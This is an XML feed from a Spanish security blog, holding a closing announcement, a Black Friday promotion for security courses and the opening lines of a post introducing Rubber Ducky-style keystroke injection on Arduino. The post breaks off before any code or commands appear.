<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:blogger='http://schemas.google.com/blogger/2008' xmlns:georss='http://www.georss.org/georss' xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-2635749723269966578</id><updated>2026-01-11T10:11:28.560+01:00</updated><category term="Hacking"/><category term="Seguridad"/><category term="Hacker"/><category term="Entrevista"/><category term="Un Minuto sin 010101"/><category term="Malware"/><category term="Humor"/><category term="vulnerabilidades"/><category term="Analisis Forense"/><category term="Android"/><category term="Niña Repelente"/><category term="Windows Técnico"/><category term="Eventos"/><category term="Google Hacking"/><category term="Smartphone"/><category term="Hardware"/><category term="Metasploit"/><category term="¿Y tu de quien eres?"/><category term="Virus"/><category term="WIFI"/><category term="Herramientas"/><category term="Conferencias"/><category term="Meterpreter"/><category term="Password"/><category term="Penetration Testing"/><category term="Windows 8"/><category term="Exploit"/><category term="Formación"/><category term="Microsoft"/><category term="Python"/><category term="Web"/><category term="Windows"/><category term="Análisis Malware"/><category term="Ciberespionaje"/><category term="Congreso"/><category term="Google"/><category term="Pentesting"/><category term="Phishing"/><category term="Whatsapp"/><category term="Apple"/><category term="CON"/><category term="Ingeniería Social"/><category term="Programación"/><category term="Usb"/><category term="Auditoria Web"/><category term="Correos"/><category term="Criptografía"/><category term="Involución"/><category term="de 0 a exploiting"/><category term="Anonimato"/><category term="Footprinting"/><category term="Hardware Hacking"/><category term="Man In The Middle"/><category term="Privacidad"/><category term="XSS"/><category term="exploiting"/><category term="Cursos"/><category term="Fare9"/><category term="Fraude Online"/><category term="Linux"/><category term="PHP"/><category term="SQL Injection"/><category term="Sec Admin"/><category term="Troyanos"/><category term="Wordpress"/><category term="assembly"/><category term="rubber ducky"/><category term="Archivos"/><category term="Ciberguerra"/><category term="Fingerprinting Browser"/><category term="Redes Sociales"/><category term="Shodan"/><category term="Software"/><category term="VideoJuegos"/><category term="Antivirus"/><category term="Backdoor"/><category term="CiberCrimen"/><category term="Cine"/><category term="HTML5"/><category term="Ingeniería Inversa"/><category term="Libros"/><category term="Nod32"/><category term="Noticias"/><category term="Pentester"/><category term="Redes"/><category term="Reportar fallos"/><category term="Servidor"/><category term="Sistemas"/><category term="Wireless"/><category term="script"/><category term="shellcode"/><category term="0-Day"/><category term="ARP Spoofing"/><category term="AntiMalware"/><category term="Blogs"/><category term="Bugtraq"/><category term="Concurso"/><category term="Curiosidades"/><category term="DoS"/><category term="Escaner"/><category term="Espionaje"/><category term="Fingerprinting"/><category term="Fuga Información"/><category term="Hacking con Buscadores"/><category term="JavaScript"/><category term="Keylogger"/><category term="Laboratorio"/><category term="Navegador"/><category term="Office 2013"/><category term="Open Source"/><category term="PDF"/><category term="PowerShell"/><category term="Research"/><category term="Reto"/><category term="Robot"/><category term="Router"/><category term="SET"/><category term="SharePoint"/><category term="Skype"/><category term="Social-Engineering Toolkit"/><category term="Spy Block"/><category term="Tablet"/><category term="Ubuntu"/><category term="Viñetikas"/><category term="debugger"/><category term="AP FAKE"/><category term="APK"/><category term="Adobe"/><category term="Adware"/><category term="AndroidSwissKnife"/><category term="AntiExploit"/><category term="Aplicación"/><category term="Bing Hacking"/><category term="Borrado seguro"/><category term="C"/><category term="CSRF"/><category term="Ciberacoso"/><category term="Ciberseguridad"/><category term="Crawler"/><category term="Cree.py"/><category term="DNS"/><category term="Diseño"/><category term="Domótica"/><category term="EXIF"/><category term="Escalabilidad de Privilegios"/><category term="Espionaje Industrial"/><category term="Estación Informática"/><category term="Estadísticas"/><category term="Facebook"/><category term="Flu"/><category term="Gusano"/><category term="HTTPS"/><category term="Hijacking"/><category term="Internet"/><category term="Internet Explorer"/><category term="Internet de las cosas"/><category term="Metadatos"/><category term="Meterpreter Android"/><category term="Moodle"/><category term="Post-Explotación"/><category term="PowerPoint"/><category term="RAM"/><category term="SCADA"/><category term="Spam"/><category term="Tracking"/><category term="Trucos"/><category term="Virtualización"/><category term="Windows Server 2012"/><category term="Windows XP"/><category term="bitcoin"/><category term="information disclosure"/><category term="kali"/><category term="ponencias"/><category term="regalos"/><category term="return to libc"/><category term="torrescrack"/><category term="videos"/><category term="ARP"/><category term="ASLR"/><category term="Aicran"/><category term="AlienVault"/><category term="Analisis dinamico"/><category term="Androrat"/><category term="Análisis Patrocinado"/><category term="Armitage"/><category term="Backtrack"/><category term="BeeF"/><category term="Bitácoras"/><category term="Bot"/><category term="Botnet"/><category term="Broma"/><category term="Buena Música para una Tarde de Sábado"/><category term="Bug"/><category term="Bugtroid"/><category term="Bulos"/><category term="Burpsuite"/><category term="Bypass Login"/><category term="Cache"/><category term="Calendario"/><category term="Camisetas Frikis"/><category term="Captcha"/><category term="Censura"/><category term="Ciberseg"/><category term="Cisco"/><category term="Citrix"/><category term="Coche"/><category term="Confidencialidad"/><category term="Cracking"/><category term="Cuckoo"/><category term="CuckooSandbox"/><category term="Cuckoobox"/><category term="Curso"/><category term="Cyber criminals"/><category term="Cámaras"/><category term="Códigos QR"/><category term="Cómics"/><category term="DHCP ACK Injection"/><category term="DMZ"/><category term="DNS Hijacking"/><category term="DNS Spoofing"/><category term="Data Science"/><category term="Datos"/><category term="Debian"/><category term="Deep Web"/><category term="Defacement"/><category term="Diseño Web"/><category term="Documental"/><category term="Documentos"/><category term="Droidbox"/><category term="Drupal"/><category term="DuckDuckGo Hacking"/><category term="Dumb0."/><category term="Dump"/><category term="Edén"/><category term="Efemérides"/><category term="Enumeracion"/><category term="Escáner Puertos"/><category term="Esteganografía"/><category term="Ettercap"/><category term="Evadir Mac Filter"/><category term="Evilgrade"/><category term="Experimento Social"/><category term="Fake"/><category term="Fake apps"/><category term="Firefox"/><category term="Firewall"/><category term="Flash"/><category term="Fuerza Bruta"/><category term="Futurista"/><category term="Fuzz"/><category term="GNU"/><category term="GUI"/><category term="Gema López"/><category term="Gema López Sánchez"/><category term="GitHub"/><category term="Gmail"/><category term="GoT"/><category term="HIDS"/><category term="HTM5"/><category term="HTTP"/><category term="Hacker Épico"/><category term="Hacking web"/><category term="Heartbleed"/><category term="Honeypot Malware"/><category term="Hotmail"/><category term="IA"/><category term="IBM"/><category term="IOS"/><category term="IPv4"/><category term="IPv6"/><category term="Ilustración"/><category term="Imagenes"/><category term="Indetectables"/><category term="Instagram"/><category term="Integridad"/><category term="Inteligencia Artificial"/><category term="Intelligence"/><category term="Internet delas cosas"/><category term="Inyección Código"/><category term="Inyección de código"/><category term="JQuery"/><category term="Llamadas"/><category term="Machine Learning"/><category term="Malicious Attack"/><category term="Mekronos"/><category term="Mekronos Metamorfosis"/><category term="Microsoft Azure"/><category term="Mr.Robot"/><category term="Navaja Negra"/><category term="Nessus"/><category term="Nslookup"/><category term="Nube"/><category term="OSINT"/><category term="Open Redirect"/><category term="Ophcrack"/><category term="Outlook"/><category term="PaX"/><category term="Parche"/><category term="Pastebin"/><category term="Películas"/><category term="Penetración"/><category term="Premios"/><category term="Project 2013"/><category term="Protección Infantil"/><category term="Punset"/><category term="ROP"/><category term="Radio"/><category term="Raspberry Pi"/><category term="Rea"/><category term="Return Oriented Programming"/><category term="Robo de Identidad"/><category term="Rootkits"/><category term="SIEM"/><category term="SMB"/><category term="SSID Oculto"/><category term="SSL"/><category term="SSL certificate"/><category term="SSLstrip"/><category term="Satoshi Nakamoto"/><category term="Scam"/><category term="Screenshot"/><category term="Sevilla"/><category term="Sidejacking"/><category term="Sptoolkit"/><category term="Steve Jobs"/><category term="Table"/><category term="Tamariz"/><category term="Teléfono"/><category term="TheHarvester"/><category term="Tienda Online"/><category term="Tor"/><category term="TrueCrypt"/><category term="UAH"/><category term="Ubisoft"/><category term="Unix"/><category term="Vídeos"/><category term="Wardriving"/><category term="Web Shell"/><category term="WebRTC"/><category term="Webcam"/><category term="Windows Server"/><category term="X1Sonrisa"/><category term="ZampaCON"/><category term="arduino"/><category term="batman"/><category term="bd"/><category term="bing"/><category term="capture the flag"/><category term="challenge"/><category term="ctf"/><category term="cybersecurity"/><category term="drones"/><category term="emulador"/><category term="ensamblador"/><category term="exploit remoto"/><category term="expoiting"/><category term="falseo de frame"/><category term="file upload"/><category term="flask"/><category term="forensic skype"/><category term="freak"/><category term="función incorrecta"/><category term="game of thrones"/><category term="geek"/><category term="hardening"/><category term="iPhone"/><category term="juego de tronos"/><category term="leak"/><category term="magic"/><category term="mimikatz"/><category term="navidad"/><category term="netcat"/><category term="off-by-one"/><category term="offbyone"/><category term="opcodes"/><category term="payload"/><category term="pila"/><category term="protectoras animales"/><category term="protocolo"/><category term="remote command execution"/><category term="seguridad física"/><category term="shell"/><category term="shielducky"/><category term="skype forensic"/><category term="sniffer"/><category term="sockets"/><category term="stack"/><category term="stack overflow"/><category term="telnet"/><category term="twitter"/><category term="virtualbox"/><category term="vm"/><category term="vmware"/><category term="whistleblowing"/><category term="xnspy"/><category term="zas en toda la boca"/><title type='text'>Estación Informática</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='https://estacioninformatica.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/2635749723269966578/posts/default?max-results=8'/><link rel='alternate' type='text/html' href='https://estacioninformatica.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><link rel='next' type='application/atom+xml' href='https://www.blogger.com/feeds/2635749723269966578/posts/default?start-index=9&amp;max-results=8'/><author><name>n0ipr0cs</name><uri>http://www.blogger.com/profile/04491865020723502347</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>573</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>8</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-2635749723269966578.post-6876279491200281016</id><published>2018-01-06T19:18:00.002+01:00</published><updated>2018-01-06T19:18:39.395+01:00</updated><title type='text'>Hasta Siempre!</title><content type='html'>Estación Informática cierra sus puertas para siempre, han sido 7 años estupendos, pero el poco tiempo para gestionar el blog y nuevos proyectos hacen que termine aquí hoy. Todo tiene su fin.&lt;br /&gt;
&lt;br /&gt;
Recordaros que la cuenta de Twitter &lt;a href=&quot;https://twitter.com/EInformtica&quot; target=&quot;_blank&quot;&gt;@EInformtica&lt;/a&gt; se va a cerrar en breve, pero podéis seguir disfrutando de noticias y más en &lt;a href=&quot;https://twitter.com/n0ipr0cs&quot; target=&quot;_blank&quot;&gt;@n0ipr0cs&lt;/a&gt; .&lt;br /&gt;
&lt;br /&gt;
Un abrazo!&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;img border=&quot;0&quot; data-original-height=&quot;920&quot; data-original-width=&quot;1272&quot; height=&quot;462&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicGYo3kw1VV7pJYSvT5WuESRy0p7Du1oVCjq25XGWBsJ_DClB3QP7ZcQfBdI6luq_8uwYGAjDc12eO0gmY4bXZnmJuaTXEwW7P35RPQ22zssgHZ-jfiQY6jwS7PwzvoT1NXKX2O2EBFX4/s640/1272x920design_01.jpg&quot; width=&quot;640&quot; /&gt;&lt;/div&gt;
&lt;br /&gt;</content><link rel='replies' type='application/atom+xml' href='https://estacioninformatica.blogspot.com/feeds/6876279491200281016/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='https://estacioninformatica.blogspot.com/2018/01/hasta-siempre.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/2635749723269966578/posts/default/6876279491200281016'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/2635749723269966578/posts/default/6876279491200281016'/><link rel='alternate' type='text/html' href='https://estacioninformatica.blogspot.com/2018/01/hasta-siempre.html' title='Hasta Siempre!'/><author><name>n0ipr0cs</name><uri>http://www.blogger.com/profile/04491865020723502347</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicGYo3kw1VV7pJYSvT5WuESRy0p7Du1oVCjq25XGWBsJ_DClB3QP7ZcQfBdI6luq_8uwYGAjDc12eO0gmY4bXZnmJuaTXEwW7P35RPQ22zssgHZ-jfiQY6jwS7PwzvoT1NXKX2O2EBFX4/s72-c/1272x920design_01.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2635749723269966578.post-136455848828928523</id><published>2017-11-20T23:32:00.000+01:00</published><updated>2017-11-20T23:32:15.580+01:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Analisis Forense"/><category scheme="http://www.blogger.com/atom/ns#" term="Formación"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Seguridad"/><title type='text'>Aprovéchate de las ofertas de Black Friday de la mano de Securízame</title><content type='html'>&lt;div class=&quot;MsoNormal&quot; style=&quot;background: white; line-height: normal; margin-bottom: 7.5pt; text-align: justify;&quot;&gt;
&lt;span style=&quot;font-family: Lato, serif; font-size: 13.5pt;&quot;&gt;Ha
llegado nuevamente esa época del año dónde tiene lugar el conocido &lt;/span&gt;&lt;b style=&quot;font-family: Lato, serif; font-size: 13.5pt;&quot;&gt;“Black Friday”,&lt;/b&gt;&lt;span style=&quot;font-family: Lato, serif; font-size: 13.5pt;&quot;&gt;día de Noviembre que se
ha vuelto muy popular en los últimos años como tradición previa al día de Acción
de Gracias y campaña pre navideña en la que las tiendas aprovechan para hacer
significativas &lt;/span&gt;&lt;b style=&quot;font-family: Lato, serif; font-size: 13.5pt;&quot;&gt;rebajas&lt;/b&gt;&lt;span style=&quot;font-family: Lato, serif; font-size: 13.5pt;&quot;&gt; en sus
diversos productos y servicios.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGpqQUEmfdU-HbR1HXaAoWGUthT_rL-WL1xlpszrMzlR0qe6_SNqD6HXecSfa2uktIU3RnHoz1QqCsxrHuUue39fRjuppoJ62MAJNJ5fDzp2JOLorDWrRwCK0IYVXjMXtnnlnmTJghfnE/s1600/BlackFriday+Securizame+1.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;1000&quot; data-original-width=&quot;1600&quot; height=&quot;250&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGpqQUEmfdU-HbR1HXaAoWGUthT_rL-WL1xlpszrMzlR0qe6_SNqD6HXecSfa2uktIU3RnHoz1QqCsxrHuUue39fRjuppoJ62MAJNJ5fDzp2JOLorDWrRwCK0IYVXjMXtnnlnmTJghfnE/s400/BlackFriday+Securizame+1.jpg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background: white; line-height: normal; margin-bottom: 7.5pt; text-align: justify;&quot;&gt;
&lt;b&gt;&lt;span lang=&quot;ES-MX&quot; style=&quot;font-family: &amp;quot;Lato&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 13.5pt; mso-bidi-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: ES-MX;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background: white; line-height: normal; margin-bottom: 7.5pt; text-align: justify;&quot;&gt;
&lt;b&gt;&lt;span lang=&quot;ES-MX&quot; style=&quot;font-family: &amp;quot;Lato&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 13.5pt; mso-bidi-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: ES-MX;&quot;&gt;Securízame&lt;/span&gt;&lt;/b&gt;&lt;span lang=&quot;ES-MX&quot; style=&quot;font-family: &amp;quot;Lato&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 13.5pt; mso-bidi-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: ES-MX;&quot;&gt;&amp;nbsp;es una plataforma de servicios informáticos y cursos que ha
cumplido ya &lt;b&gt;5 años&lt;/b&gt;, y que de la mano
de su &lt;b&gt;CEO Lorenzo Martínez Rodríguez, &lt;/b&gt;se
especializa principalmente en&amp;nbsp;ser una opción de gran calidad cuando se
busca mejorar tu formación profesional en temas de &lt;b&gt;hacking, análisis forense
y peritaje, hardening&lt;/b&gt;, así como&lt;b&gt;
seguridad informática en general,&lt;/b&gt; ya que ofrece multitud decursos online y presenciales en los que han participado
más de &lt;b&gt;600 alumnos, &lt;/b&gt;con opiniones muy positivas acerca de lo que han
conseguido aprender y mejorar gracias a esta empresa de seguridad.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background: white; line-height: normal; margin-bottom: 7.5pt; text-align: justify;&quot;&gt;
&lt;span lang=&quot;ES-MX&quot; style=&quot;font-family: &amp;quot;Lato&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 13.5pt; mso-bidi-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: ES-MX;&quot;&gt;Securízame, puede garantizar a
sus alumnos que cuenta con una plantilla de profesores que son verdaderos profesionales
en el sector de seguridad informática.Por ello cada curso tiene una gran
calidad, tanto en el contenido como en la comunicación de los profesores: ellos
no quieren que solo te sientes a aprender algo nuevo por tu cuenta, sino que lo
manejan de forma dinámica y asegurándose de que logres aprender todo lo que
tienen para compartirte y así mejores tu calidad y nivel de formación
profesional. Se basan en su experiencia en cada tema y lo transmiten con
eficacia a los alumnos.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLVQiiZ19ST7wbFa_3coLyvn3W__Y-Gvv8Ja7HHB6b5LVGSCAsVuLyIoVV5w96d_gnjHfxII4q8dX4wW25VBSac2hjgh40p3l6hsJxvZSk5sETFmAh_lIefKjJmh3amxQjfHM00eanS5Q/s1600/BlackFriday+Securizame+2.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;1038&quot; data-original-width=&quot;910&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLVQiiZ19ST7wbFa_3coLyvn3W__Y-Gvv8Ja7HHB6b5LVGSCAsVuLyIoVV5w96d_gnjHfxII4q8dX4wW25VBSac2hjgh40p3l6hsJxvZSk5sETFmAh_lIefKjJmh3amxQjfHM00eanS5Q/s400/BlackFriday+Securizame+2.jpg&quot; width=&quot;350&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background: white; line-height: normal; margin-bottom: 7.5pt; text-align: justify;&quot;&gt;
&lt;span lang=&quot;ES-MX&quot; style=&quot;font-family: &amp;quot;Lato&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 13.5pt; mso-bidi-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: ES-MX;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background: white; line-height: normal; margin-bottom: 7.5pt; text-align: justify;&quot;&gt;
&lt;span lang=&quot;ES-MX&quot; style=&quot;font-family: Lato, serif; font-size: 13.5pt;&quot;&gt;La
plataforma nos ofrece cursos en varias categorías relacionadas con distintos
ámbitos de la seguridad informática:&amp;nbsp;&lt;b&gt;Hacking,Hardening, Análisis Forense y Python&lt;/b&gt;.
Además de contar con &lt;b&gt;Packs&lt;/b&gt; que ya de
por si tienen un precio reducido al ser paquetes que incluyen varios tipos de
cursos en uno mismo, así puedes obtener todo lo que necesitas con un precio aún
menor. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background: white; line-height: normal; margin-bottom: 7.5pt; text-align: justify;&quot;&gt;
&lt;span lang=&quot;ES-MX&quot; style=&quot;font-family: Lato, serif; font-size: 13.5pt;&quot;&gt;También
podrías tener opción a hacer un curso presencial en las oficinas de Securízame,
ubicadas en Madrid, donde podréis aprender de mano de los mejores profesores y
practicar en sus diversos laboratorios, dependiendo de la temática del curso.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background: white; line-height: normal; margin-bottom: 7.5pt; text-align: justify;&quot;&gt;
&lt;span lang=&quot;ES-MX&quot; style=&quot;font-family: Lato, serif; font-size: 13.5pt;&quot;&gt;Si
estás interesado en realizar alguno de estos cursos, puedes ver el amplio
catálogo con el que cuentan ingresando a la &lt;b&gt;&lt;u&gt;siguiente página web&lt;/u&gt;&lt;/b&gt;(https://cursos.securizame.com/) Y si
decides hacerlo hoy mismo &lt;b&gt;¡Puedes
aprovechar el descuento especial no acumulable del 25% por el Black Friday en
TODOS los CURSOS ONLINE!&lt;/b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background: white; line-height: normal; margin-bottom: 7.5pt; text-align: justify;&quot;&gt;
&lt;span lang=&quot;ES-MX&quot; style=&quot;font-family: Lato, serif; font-size: 13.5pt;&quot;&gt;Para
poder hacerlo válido, tan solo debes introducir el código promocional “&lt;b&gt;BLACKFRIDAY2017&lt;/b&gt;”
en el campo correspondiente al momento de hacer tu registro en el curso para
que se aplique dicha rebaja. Los packs de cursos que os comentábamos anteriormente
también cuentan con el mismo descuento, &lt;b&gt;¡Así
que no pierdas la oportunidad de hacer ese curso que tanto has querido a un
precio casi de regalo!&lt;/b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background: white; line-height: normal; margin-bottom: 7.5pt; text-align: justify;&quot;&gt;
&lt;span lang=&quot;ES-MX&quot; style=&quot;font-family: Lato, serif; font-size: 13.5pt;&quot;&gt;Esta
oferta solo es válida durante el día&lt;b&gt;24
de Noviembre de 2017&lt;/b&gt;, de &lt;b&gt;00:00 a 23:59:59&lt;/b&gt;
en horario peninsular de España, y &lt;b&gt;¿Sabes
qué es lo mejor?&lt;/b&gt; Que si en estos días no te viene bien realizar ninguno de
sus cursos porque no tienes tiempo o estás atareado con otras cosas, ¡No hay
problema! En Securízame los cursos &lt;b&gt;no
tienen una fecha de inicio determinada&lt;/b&gt;, sino que puedes comenzar &lt;b&gt;cuando tú quieras&lt;/b&gt;. Sólo tienes que
registrar&lt;a href=&quot;https://www.blogger.com/null&quot; name=&quot;_GoBack&quot;&gt;&lt;/a&gt;te y hacer el pago con el código promocional &lt;b&gt;BLACKFRIDAY2017&lt;/b&gt;, y&amp;nbsp;especificarles
cuándo quieres empezar con el curso, así ellos tendrán todo el material listo
para cuando tú elijas, que puede ser hoy, mañana, en dos semanas o incluso el
año próximo. &lt;b&gt;¡Así no pierdes la
oportunidad de aprovechar este descuento especial! &lt;/b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;background: white; line-height: normal; margin-bottom: 7.5pt; text-align: justify;&quot;&gt;
&lt;span lang=&quot;ES-MX&quot; style=&quot;font-family: Lato, serif; font-size: 13.5pt;&quot;&gt;Así
que, si estás buscando una buena opción de formación online en &lt;b&gt;hacking, análisis forense o seguridad informática&lt;/b&gt;,
sin duda este es momento de aprovechar el &lt;b&gt;BlackFriday&lt;/b&gt;con una empresa que vale muchísimo la pena.&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='https://estacioninformatica.blogspot.com/feeds/136455848828928523/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='https://estacioninformatica.blogspot.com/2017/11/aprovechate-de-las-ofertas-de-black.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/2635749723269966578/posts/default/136455848828928523'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/2635749723269966578/posts/default/136455848828928523'/><link rel='alternate' type='text/html' href='https://estacioninformatica.blogspot.com/2017/11/aprovechate-de-las-ofertas-de-black.html' title='Aprovéchate de las ofertas de Black Friday de la mano de Securízame'/><author><name>n0ipr0cs</name><uri>http://www.blogger.com/profile/04491865020723502347</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGpqQUEmfdU-HbR1HXaAoWGUthT_rL-WL1xlpszrMzlR0qe6_SNqD6HXecSfa2uktIU3RnHoz1QqCsxrHuUue39fRjuppoJ62MAJNJ5fDzp2JOLorDWrRwCK0IYVXjMXtnnlnmTJghfnE/s72-c/BlackFriday+Securizame+1.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2635749723269966578.post-1996196117045677712</id><published>2017-09-12T23:55:00.001+02:00</published><updated>2017-09-13T09:48:26.325+02:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="arduino"/><category scheme="http://www.blogger.com/atom/ns#" term="flask"/><category scheme="http://www.blogger.com/atom/ns#" term="GoT"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacker"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Hardware Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="kali"/><category scheme="http://www.blogger.com/atom/ns#" term="Microsoft"/><category scheme="http://www.blogger.com/atom/ns#" term="mimikatz"/><category scheme="http://www.blogger.com/atom/ns#" term="Mr.Robot"/><category scheme="http://www.blogger.com/atom/ns#" term="Python"/><category scheme="http://www.blogger.com/atom/ns#" term="rubber ducky"/><category scheme="http://www.blogger.com/atom/ns#" term="Windows"/><title type='text'>Mr.Robot también en Arduino</title><content type='html'>Buenas amigos, soy Fare9, y hoy traigo un post sobre hacking en Windows con hardware algo específico, así que allá vamos.&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRZsoR4mO0i1snHvZCX_zBWz7yUUBrndPSAmW9sfBDGhhTCCsqZyeTfY0QxbT3U7zylUNIFJoqtNgZkUju4EPrB7w_V4senJSNFbfumA-qTXQhTYqWqChMpEyCMDLs-A0Y2d0QptdDooY/s1600/4d7.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;700&quot; data-original-width=&quot;700&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRZsoR4mO0i1snHvZCX_zBWz7yUUBrndPSAmW9sfBDGhhTCCsqZyeTfY0QxbT3U7zylUNIFJoqtNgZkUju4EPrB7w_V4senJSNFbfumA-qTXQhTYqWqChMpEyCMDLs-A0Y2d0QptdDooY/s320/4d7.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Hace ya tiempo, en Mr.Robot apareció un pequeño aparatito conocido como Rubber Ducky, del cual ya se ha hablado en este blog (&lt;a href=&quot;https://estacioninformatica.blogspot.com.es/search?q=rubber+ducky&quot; target=&quot;_blank&quot;&gt;Rubber Ducky&lt;/a&gt;). Con este aparatito, se pensó el la ejecución de comandos a través de teclado.&lt;br /&gt;
Esto es posible debido a que bueno, como podréis encontrar en la web, se trata de un procesador de 32 bits y 60 MHz que es capaz de funcionar como un HID (Human Interface Device) más en concreto como un teclado, y a través de un sencillo lenguaje de scripting y un encoder a binario nos permite escribir a través del USB como si se tratara de un simple teclado. Y luego blah,blah,blah...&lt;br /&gt;
&lt;br /&gt;
&lt;i&gt;Esto está muy bien, pero ¿qué problema hay?, y ¿por qué todo este rollo Fare9?....&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
